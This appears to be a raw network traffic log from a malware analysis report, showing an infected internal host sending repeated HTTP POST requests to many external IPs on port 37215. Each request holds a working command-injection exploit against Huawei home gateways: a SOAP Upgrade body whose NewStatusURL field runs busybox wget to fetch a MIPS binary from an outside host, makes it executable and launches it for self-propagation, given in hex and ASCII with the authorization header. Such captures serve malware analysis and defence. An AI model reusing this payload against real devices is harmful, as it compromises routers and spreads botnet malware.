                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2280192.168.2.153880841.67.185.23137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.350567102 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2281192.168.2.1556262157.209.176.21537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.356720924 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2282192.168.2.1542994157.207.208.21137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.356784105 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2283192.168.2.153852841.95.232.5737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.356839895 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2284192.168.2.1555482197.113.47.4937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.356853008 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2285192.168.2.1541720197.52.145.18137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.357220888 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2286192.168.2.1556318197.75.117.6837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.357362032 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2287192.168.2.1537966197.253.44.8337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.357438087 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2288192.168.2.154200841.221.188.7237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.357738018 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2289192.168.2.1557966157.34.97.18737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.358211994 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
